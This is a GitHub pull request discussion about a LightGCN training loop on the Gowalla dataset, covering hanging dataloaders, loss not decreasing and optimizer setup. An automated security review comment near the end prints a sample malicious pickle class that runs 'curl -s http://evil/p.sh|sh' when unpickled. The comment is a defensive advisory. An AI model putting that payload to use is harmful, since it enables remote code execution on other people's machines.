Skip to content

Conversation

@swong3-sc
Copy link
Collaborator

@swong3-sc swong3-sc commented Dec 3, 2025

Scope of work done

This is my training loop for LightGCN on the gowalla dataset.
There are a number of issues I can't seem to figure out:

  1. The dataloaders seem to fail when training (usually at the 17th batch). There is no error it just hangs at line 587
  2. The loss doesn't decrease

I have tried many things to address the loss:

  1. Adding a sparse optimizer from TorchRec (RowWiseAdagrad)
  2. Added Xavier uniform initialization after discovering the initial embeddings were too small, and thus would not propagate.
  3. After the above didn't work, decided to scale up the embeddings after the forward pass, under the assumption that the convolution was shrinking the embeddings too much

I use this command to run the training locally:
PYTHONWARNINGS=ignore WORLD_SIZE=1 RANK=0 MASTER_ADDR="localhost" MASTER_PORT=20000 python -m GiGL.examples.id_embeddings.heterogeneous_training --task_config_uri="gs://gigl-perm-dev-assets/swong3_gowalla_data_preprocessor_24/config_populator/frozen_gbml_config.yaml"

The parameters are derived from the task config, but I will list them here for reference:
Got training args local_world_size=1, num_neighbors={user-to_train-item: [10, 10], user-to_test-item: [0, 0], item-to_train-user: [15, 15], item-to_test-user: [0, 0]}, sampling_workers_per_process=4, main_batch_size=16, random_batch_size=16, embedding_dim=64, num_layers=2, num_random_negs_per_pos=1, l2_lambda=0.0, sampling_worker_shared_channel_size=4GB, process_start_gap_seconds=0, log_every_n_batch=50, learning_rate=0.01, weight_decay=0.0005, num_max_train_batches=1000, num_val_batches=100, val_every_n_batch=50

Where is the documentation for this feature?: N/A

Did you add automated tests or write a test plan?

Updated Changelog.md? NO

Ready for code review?: NO

Comment on lines +464 to +470
for name, param in base_model._embedding_bag_collection.named_parameters():
logger.info(f" Applying RowWiseAdagrad to {name}")
apply_optimizer_in_backward(
optimizer_class=RowWiseAdagrad,
params=[param],
optimizer_kwargs={"lr": sparse_lr, "weight_decay": weight_decay},
)
Copy link
Collaborator

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

conventional pattern is to just call apply_optimizer_in_backward once with all the sparse parameters instead of one by one -- i recommend doing this to avoid deviating from this pattern unnecessarily

https://github.com/meta-pytorch/torchrec/blob/aa1eeda49d0691adeed14dca5e184baab708065f/examples/golden_training/train_dlrm.py#L113

Copy link
Collaborator Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Will change

return loss, debug_info


def _training_process(
Copy link
Collaborator

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

i would recommend testing everything related to loss reduction in single-process, no distributed

return main_loader, random_negative_loader


def bpr_loss(
Copy link
Collaborator

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

to debug whether actually minimizing BPR is causing some specific issue or if it's just something else that is broken, i recommend testing with a dummy loss, which is very easy to minimize. e.g. minimizing sum of query embedding + positive embedding + negative embedding or something. in such case, just making all numbers in each embedding smaller should reduce loss and it's very trivial to optimize. if embeddings still aren't getting updated properly and loss still doesn't go down after that change, this indicates something is very likely broken with the optimization/gradient flow.

Copy link
Collaborator Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

With BPR loss, I am able to go from about 0.6913 -> 0.2335 in 1000 batches of size 512.

@nshah-sc
Copy link
Collaborator

nshah-sc commented Dec 3, 2025

can you add a run command so we know all the parameter used and how to kick this off locally?

Copy link
Collaborator

@nshah-sc nshah-sc left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

sorry forgot to submit this review which has associated comments

query_emb: torch.Tensor, # [M, D]
pos_emb: torch.Tensor, # [M, D]
neg_emb: torch.Tensor, # [M, D] or [M, K, D]
l2_lambda: float = 0.0,
Copy link
Collaborator

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

i don't think you need l2 lambda -- this is basically just applying l2 regularization right? we already have weight decay, which is functionally same as l2 regularization

Copy link
Collaborator Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I will look into disabling this and comparing the output.

# Sample some actual node IDs
debug_info["sample_query_ids"] = rep_query_idx[:5].tolist()
debug_info["sample_pos_ids"] = pos_idx[:5].tolist()

Copy link
Collaborator

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

i'm not sure exactly what this function does as the logic looks fairly complex but i assume we have tested correctness that the samples generated here for the positive edge subgraph and the negative edge subgraphs are all correct in that they reflect accurate graph structure and nothing has gone wrong there.

Comment on lines 487 to 505
logger.info(f"---Rank {rank} initializing embeddings with scaled Xavier uniform (AFTER DMP)")
unwrapped_model = unwrap_from_dmp(model)
logger.info(f"EmbeddingBagCollection parameters:")
init_count = 0
EMBEDDING_SCALE = 0.1 # Small scale to avoid saturation
for name, param in unwrapped_model._embedding_bag_collection.named_parameters():
logger.info(f" Found parameter: {name}, shape: {param.shape}, device: {param.device}")
logger.info(f" BEFORE init - mean={param.mean().item():.6f}, std={param.std().item():.6f}, norm={param.norm().item():.6f}")

# Xavier uniform: U(-sqrt(6/(fan_in + fan_out)), sqrt(6/(fan_in + fan_out)))
# For embeddings: fan_in = 1, fan_out = embedding_dim
# Then scale up to combat LightGCN's aggressive neighbor averaging
torch.nn.init.xavier_uniform_(param)
param.data *= EMBEDDING_SCALE
init_count += 1

logger.info(f" AFTER init (scaled {EMBEDDING_SCALE}x) - mean={param.mean().item():.6f}, std={param.std().item():.6f}, norm={param.norm().item():.6f}")

logger.info(f"Initialized {init_count} embedding parameters after DMP wrapping with {EMBEDDING_SCALE}x scaling")
Copy link
Collaborator

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

i don't think you actually need this and you should still be able to train these models despite doing manual embedding surgery for initialization. even just their default random initialization should be reasonable starting spot. i'd suggest dropping this to avoid overcomplicating the example

Copy link
Collaborator Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Yeah, I agree


optimizer.zero_grad()
logger.info(f"Zeroing gradients")
main_data = next(train_main_iter)
Copy link
Collaborator

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

maybe @kmontemayor2-sc can help you debug why this hangs after some fixed # of batches in your current setting. sometimes this can happen if the iterator runs out of data, which shouldn't be possible given the InfiniteIterator logic, but if it's hanging always after 17 batches it indicates there is some deterministic issue. maybe it hangs after it finishes like one whole pass of the data, and cannot appropriately cycle back for another pass due to exception handling/un-terminate-able logic in the iterator code. or, perhaps the dataloader always fails/hangs on a particular seed node that appears after 17 batches. debugging which is true is important and can be done in isolation of this whole example. I'd recommend doing all this in one process as well to avoid getting errors randomly suppressed due to multiprocessing environment.

Copy link
Collaborator Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

@kmontemayor2-sc and @mkolodner-sc helped greatly, and we sort of figured it out by increasing the number of sampling workers. I can now train locally and minimize loss, which is good.

node_type_to_num_nodes[node_type] = num_nodes
logger.info(f"Node type {node_type}: {num_nodes} nodes (max_id={max_id})")
output_list = [None for _ in range(torch.distributed.get_world_size())]
torch.distributed.all_gather_object(output_list, node_type_to_num_nodes)

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Semgrep identified an issue in your code:

all_gather_object unpickles data from peers. A hostile rank can send a crafted object that executes code on your process during the collective.

More details about this

torch.distributed.all_gather_object(output_list, node_type_to_num_nodes) receives Python objects from every peer and unpickles them. Because unpickling executes attacker‑controlled reducers, a malicious or compromised rank can make your process run arbitrary code as soon as the collective completes.

Concrete exploit path

  • Setup: init_process_group(backend="gloo") creates a process group where every rank exchanges objects.
  • Attacker control: A hostile rank crafts an object whose reduce triggers a command (e.g., to drop a shell or exfiltrate secrets).
  • Trigger: When your code calls torch.distributed.all_gather_object(output_list, node_type_to_num_nodes), the library unpickles the attacker’s object before putting it into output_list.
  • Impact: Code runs within your training/data‑loading process, with your permissions (can read dataset, env vars, credentials, write to model outputs, pivot the host). Example attacker object on a peer:
    class Pwn:
    def reduce(self):
    import os
    return (os.system, ("curl -s http://evil/p.sh|sh",))
    torch.distributed.all_gather_object([None]*world_size, Pwn())
    Your process will execute the os.system payload as part of unpickling during the same all_gather_object that populates output_list.

Why this code is at risk here

  • The call site exchanges arbitrary Python objects (node_type_to_num_nodes dict) with every participant; any untrusted or compromised peer can inject a malicious object that is executed on receipt.
  • The subsequent loop over output_list happens after the dangerous unpickle has already occurred, so the damage is done even if you never use the malicious data.

To resolve this comment:

✨ Commit Assistant Fix Suggestion
  1. Only use torch.distributed.all_gather_object to share simple or builtin Python types, such as dictionaries with string and int keys/values, not arbitrary objects or classes.
  2. Check that node_type_to_num_nodes only contains basic, serializable objects; avoid custom objects or types that require pickle to deserialize.
  3. If sharing custom objects is required, serialize node_type_to_num_nodes to a safe format like JSON with json.dumps(node_type_to_num_nodes) before broadcasting, and deserialize after receiving with json.loads.
  4. Alternatively, if all participants can reconstruct the dictionary from public information, avoid transmitting it with all_gather_object and have each process build it independently.
  5. Avoid using any of the following for keys or values when sharing data: classes, functions, non-builtin types, or anything that cannot be converted to JSON.

Passing only simple objects reduces the attack surface for arbitrary code execution caused by Python's pickle mechanism in distributed functions.

💬 Ignore this finding

Reply with Semgrep commands to ignore this finding.

  • /fp <comment> for false positive
  • /ar <comment> for acceptable risk
  • /other <comment> for all other reasons

Alternatively, triage in Semgrep AppSec Platform to ignore the finding created by pickles-in-pytorch-distributed.

You can view more details about this finding in the Semgrep AppSec Platform.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

3 participants